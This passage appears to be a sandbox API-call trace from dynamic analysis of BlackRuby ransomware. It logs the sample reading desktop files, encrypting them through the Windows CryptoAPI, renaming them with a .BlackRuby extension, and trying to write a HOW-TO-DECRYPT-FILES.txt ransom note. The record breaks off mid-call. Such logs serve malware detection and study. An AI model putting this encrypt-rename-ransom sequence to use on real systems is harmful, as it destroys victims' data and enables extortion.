GetFileType (hFile=0x184) returned 0x1 [0057.181] SetErrorMode (uMode=0x0) returned 0x1 [0057.181] GetFileType (hFile=0x184) returned 0x1 [0057.183] CloseHandle (hObject=0x184) returned 1 [0057.183] GetLastError () returned 0xb7 [0057.183] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", lpFilePart=0x0) returned 0x38 [0057.183] GetLastError () returned 0xb7 [0057.183] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_L12tkDCIWVmVLgrQ2ghz20YTNrzwhNxpFBvKdkQaQ0.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_L12tkDCIWVmVLgrQ2ghz20YTNrzwhNxpFBvKdkQaQ0.BlackRuby", lpFilePart=0x0) returned 0x6c [0057.183] GetLastError () returned 0xb7 [0057.183] SetErrorMode (uMode=0x1) returned 0x0 [0057.183] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\rbkpha.rtf"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c7bff0, ftCreationTime.dwHighDateTime=0x1d3570b, ftLastAccessTime.dwLowDateTime=0x273245c0, ftLastAccessTime.dwHighDateTime=0x1d34a0e, ftLastWriteTime.dwLowDateTime=0x2a4740c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xded0)) returned 1 [0057.183] GetLastError () returned 0xb7 [0057.183] SetErrorMode (uMode=0x0) returned 0x1 [0057.183] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\rbkpha.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_L12tkDCIWVmVLgrQ2ghz20YTNrzwhNxpFBvKdkQaQ0.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\encrypted_l12tkdciwvmvlgrq2ghz20ytnrzwhnxpfbvkdkqaq0.blackruby")) returned 1 [0057.183] GetLastError () returned 0xb7 [0057.184] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0057.184] GetLastError () returned 0xb7 [0057.184] SetErrorMode (uMode=0x1) returned 0x0 [0057.184] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.184] GetLastError () returned 0x5 [0057.185] SetErrorMode (uMode=0x0) returned 0x1 [0057.185] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", lpFilePart=0x0) returned 0x45 [0057.185] GetLastError () returned 0x5 [0057.185] SetErrorMode (uMode=0x1) returned 0x0 [0057.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\td0tlucnic_hc5stmbd.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1bf0704 | out: lpFileInformation=0x1bf0704*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5693e7e0, ftCreationTime.dwHighDateTime=0x1d34f2e, ftLastAccessTime.dwLowDateTime=0xaeb343c0, ftLastAccessTime.dwHighDateTime=0x1d356f0, ftLastWriteTime.dwLowDateTime=0xaeb343c0, ftLastWriteTime.dwHighDateTime=0x1d356f0, nFileSizeHigh=0x0, nFileSizeLow=0x15839)) returned 1 [0057.186] GetLastError () returned 0x5 [0057.186] SetErrorMode (uMode=0x0) returned 0x1 [0057.186] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", lpFilePart=0x0) returned 0x45 [0057.186] GetLastError () returned 0x5 [0057.186] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", lpFilePart=0x0) returned 0x45 [0057.186] GetLastError () returned 0x5 [0057.186] SetErrorMode (uMode=0x1) returned 0x0 [0057.186] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\td0tlucnic_hc5stmbd.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.186] GetLastError () returned 0x0 [0057.186] GetFileType (hFile=0x184) returned 0x1 [0057.186] SetErrorMode (uMode=0x0) returned 0x1 [0057.186] GetFileType (hFile=0x184) returned 0x1 [0057.186] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x15839 [0057.186] GetLastError () returned 0x0 [0057.187] ReadFile (in: hFile=0x184, lpBuffer=0x2d3a870, nNumberOfBytesToRead=0x15839, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2d3a870*, lpNumberOfBytesRead=0x18ecac*=0x15839, lpOverlapped=0x0) returned 1 [0057.188] GetLastError () returned 0x0 [0057.188] CloseHandle (hObject=0x184) returned 1 [0057.188] GetLastError () returned 0x0 [0057.189] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", lpFilePart=0x0) returned 0x45 [0057.189] GetLastError () returned 0x0 [0057.189] SetErrorMode (uMode=0x1) returned 0x0 [0057.189] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\td0tlucnic_hc5stmbd.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5693e7e0, ftCreationTime.dwHighDateTime=0x1d34f2e, ftLastAccessTime.dwLowDateTime=0xaeb343c0, ftLastAccessTime.dwHighDateTime=0x1d356f0, ftLastWriteTime.dwLowDateTime=0xaeb343c0, ftLastWriteTime.dwHighDateTime=0x1d356f0, nFileSizeHigh=0x0, nFileSizeLow=0x15839)) returned 1 [0057.189] GetLastError () returned 0x0 [0057.189] SetErrorMode (uMode=0x0) returned 0x1 [0057.189] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c790) returned 1 [0057.189] GetLastError () returned 0x0 [0057.224] CryptImportKey (in: hProv=0x37c790, pbData=0x1c4c848, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360b20) returned 1 [0057.224] GetLastError () returned 0x0 [0057.224] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.225] GetLastError () returned 0x0 [0057.229] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.229] GetLastError () returned 0x0 [0057.230] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360fa0) returned 1 [0057.230] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.230] GetLastError () returned 0x0 [0057.230] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1c79894*=0x1, dwFlags=0x0) returned 1 [0057.230] GetLastError () returned 0x0 [0057.230] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1c79860, dwFlags=0x0) returned 1 [0057.230] GetLastError () returned 0x0 [0057.230] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d65a20*, pdwDataLen=0x18ec9c*=0x15930, dwBufLen=0x15930 | out: pbData=0x2d65a20*, pdwDataLen=0x18ec9c*=0x15930) returned 1 [0057.231] GetLastError () returned 0x0 [0057.231] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c798f0*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1c798f0*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0057.231] GetLastError () returned 0x0 [0057.231] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c79920*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1c79920*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0057.231] GetLastError () returned 0x0 [0057.232] CryptDestroyKey (hKey=0x360b20) returned 1 [0057.232] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.232] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.232] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", lpFilePart=0x0) returned 0x45 [0057.232] GetLastError () returned 0x0 [0057.232] SetErrorMode (uMode=0x1) returned 0x0 [0057.232] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\td0tlucnic_hc5stmbd.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.234] GetLastError () returned 0xb7 [0057.234] GetFileType (hFile=0x184) returned 0x1 [0057.234] SetErrorMode (uMode=0x0) returned 0x1 [0057.234] GetFileType (hFile=0x184) returned 0x1 [0057.236] CloseHandle (hObject=0x184) returned 1 [0057.236] GetLastError () returned 0xb7 [0057.236] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3", lpFilePart=0x0) returned 0x45 [0057.236] GetLastError () returned 0xb7 [0057.236] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_EWg7v0KxHxg9vHZDNnuM0Kn8XuJUWAVCDQIwn8i.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_EWg7v0KxHxg9vHZDNnuM0Kn8XuJUWAVCDQIwn8i.BlackRuby", lpFilePart=0x0) returned 0x69 [0057.236] GetLastError () returned 0xb7 [0057.236] SetErrorMode (uMode=0x1) returned 0x0 [0057.236] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\td0tlucnic_hc5stmbd.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5693e7e0, ftCreationTime.dwHighDateTime=0x1d34f2e, ftLastAccessTime.dwLowDateTime=0xaeb343c0, ftLastAccessTime.dwHighDateTime=0x1d356f0, ftLastWriteTime.dwLowDateTime=0x2a4e64e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x15940)) returned 1 [0057.236] GetLastError () returned 0xb7 [0057.236] SetErrorMode (uMode=0x0) returned 0x1 [0057.236] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\TD0tLUcnIC_hC5StmBD.mp3" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\td0tlucnic_hc5stmbd.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_EWg7v0KxHxg9vHZDNnuM0Kn8XuJUWAVCDQIwn8i.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\encrypted_ewg7v0kxhxg9vhzdnnum0kn8xujuwavcdqiwn8i.blackruby")) returned 1 [0057.236] GetLastError () returned 0xb7 [0057.237] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0057.237] GetLastError () returned 0xb7 [0057.237] SetErrorMode (uMode=0x1) returned 0x0 [0057.237] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.237] GetLastError () returned 0x5 [0057.237] SetErrorMode (uMode=0x0) returned 0x1 [0057.238] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", lpFilePart=0x0) returned 0x3d [0057.238] GetLastError () returned 0x5 [0057.238] SetErrorMode (uMode=0x1) returned 0x0 [0057.238] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\wlcfbo6_lwr.flv"), fInfoLevelId=0x0, lpFileInformation=0x1c96d0c | out: lpFileInformation=0x1c96d0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9658edc0, ftCreationTime.dwHighDateTime=0x1d350a6, ftLastAccessTime.dwLowDateTime=0x521a6b50, ftLastAccessTime.dwHighDateTime=0x1d3516b, ftLastWriteTime.dwLowDateTime=0x521a6b50, ftLastWriteTime.dwHighDateTime=0x1d3516b, nFileSizeHigh=0x0, nFileSizeLow=0x3371)) returned 1 [0057.238] GetLastError () returned 0x5 [0057.238] SetErrorMode (uMode=0x0) returned 0x1 [0057.238] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", lpFilePart=0x0) returned 0x3d [0057.238] GetLastError () returned 0x5 [0057.238] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", lpFilePart=0x0) returned 0x3d [0057.238] GetLastError () returned 0x5 [0057.238] SetErrorMode (uMode=0x1) returned 0x0 [0057.238] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\wlcfbo6_lwr.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.238] GetLastError () returned 0x0 [0057.238] GetFileType (hFile=0x184) returned 0x1 [0057.238] SetErrorMode (uMode=0x0) returned 0x1 [0057.238] GetFileType (hFile=0x184) returned 0x1 [0057.238] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x3371 [0057.238] GetLastError () returned 0x0 [0057.238] ReadFile (in: hFile=0x184, lpBuffer=0x1c98c50, nNumberOfBytesToRead=0x3371, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1c98c50*, lpNumberOfBytesRead=0x18ecac*=0x3371, lpOverlapped=0x0) returned 1 [0057.239] GetLastError () returned 0x0 [0057.239] CloseHandle (hObject=0x184) returned 1 [0057.239] GetLastError () returned 0x0 [0057.239] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", lpFilePart=0x0) returned 0x3d [0057.239] GetLastError () returned 0x0 [0057.239] SetErrorMode (uMode=0x1) returned 0x0 [0057.239] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\wlcfbo6_lwr.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9658edc0, ftCreationTime.dwHighDateTime=0x1d350a6, ftLastAccessTime.dwLowDateTime=0x521a6b50, ftLastAccessTime.dwHighDateTime=0x1d3516b, ftLastWriteTime.dwLowDateTime=0x521a6b50, ftLastWriteTime.dwHighDateTime=0x1d3516b, nFileSizeHigh=0x0, nFileSizeLow=0x3371)) returned 1 [0057.239] GetLastError () returned 0x0 [0057.239] SetErrorMode (uMode=0x0) returned 0x1 [0057.250] CryptImportKey (in: hProv=0x37c818, pbData=0x1cf9708, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360ce0) returned 1 [0057.250] GetLastError () returned 0x0 [0057.250] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.250] GetLastError () returned 0x0 [0057.255] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.255] GetLastError () returned 0x0 [0057.255] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360f20) returned 1 [0057.255] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.255] GetLastError () returned 0x0 [0057.255] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1d26754*=0x1, dwFlags=0x0) returned 1 [0057.255] GetLastError () returned 0x0 [0057.255] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1d26720, dwFlags=0x0) returned 1 [0057.255] GetLastError () returned 0x0 [0057.255] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d2679c*, pdwDataLen=0x18ec9c*=0x3470, dwBufLen=0x3470 | out: pbData=0x1d2679c*, pdwDataLen=0x18ec9c*=0x3470) returned 1 [0057.255] GetLastError () returned 0x0 [0057.255] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d2d0a8*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1d2d0a8*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0057.255] GetLastError () returned 0x0 [0057.255] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d2d0d8*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1d2d0d8*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0057.255] GetLastError () returned 0x0 [0057.260] CryptDestroyKey (hKey=0x360ce0) returned 1 [0057.260] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.260] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.260] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", lpFilePart=0x0) returned 0x3d [0057.260] GetLastError () returned 0x0 [0057.260] SetErrorMode (uMode=0x1) returned 0x0 [0057.260] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\wlcfbo6_lwr.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.261] GetLastError () returned 0xb7 [0057.261] GetFileType (hFile=0x184) returned 0x1 [0057.261] SetErrorMode (uMode=0x0) returned 0x1 [0057.261] GetFileType (hFile=0x184) returned 0x1 [0057.261] WriteFile (in: hFile=0x184, lpBuffer=0x1b3c64c*, nNumberOfBytesToWrite=0x3480, lpNumberOfBytesWritten=0x18ecb8, lpOverlapped=0x0 | out: lpBuffer=0x1b3c64c*, lpNumberOfBytesWritten=0x18ecb8*=0x3480, lpOverlapped=0x0) returned 1 [0057.262] GetLastError () returned 0xb7 [0057.262] CloseHandle (hObject=0x184) returned 1 [0057.263] GetLastError () returned 0xb7 [0057.263] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv", lpFilePart=0x0) returned 0x3d [0057.263] GetLastError () returned 0xb7 [0057.263] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_2NiKzDulcaNRNBvyW57bgHDimKQTNWt7OqKspAOX0ft6z.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_2NiKzDulcaNRNBvyW57bgHDimKQTNWt7OqKspAOX0ft6z.BlackRuby", lpFilePart=0x0) returned 0x6f [0057.263] GetLastError () returned 0xb7 [0057.263] SetErrorMode (uMode=0x1) returned 0x0 [0057.263] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\wlcfbo6_lwr.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9658edc0, ftCreationTime.dwHighDateTime=0x1d350a6, ftLastAccessTime.dwLowDateTime=0x521a6b50, ftLastAccessTime.dwHighDateTime=0x1d3516b, ftLastWriteTime.dwLowDateTime=0x2a5327a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x3480)) returned 1 [0057.263] GetLastError () returned 0xb7 [0057.263] SetErrorMode (uMode=0x0) returned 0x1 [0057.263] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\WLCFbO6_lWr.flv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\wlcfbo6_lwr.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_2NiKzDulcaNRNBvyW57bgHDimKQTNWt7OqKspAOX0ft6z.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\encrypted_2nikzdulcanrnbvyw57bghdimkqtnwt7oqkspaox0ft6z.blackruby")) returned 1 [0057.264] GetLastError () returned 0xb7 [0057.264] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0057.264] GetLastError () returned 0xb7 [0057.264] SetErrorMode (uMode=0x1) returned 0x0 [0057.264] CreateFileW 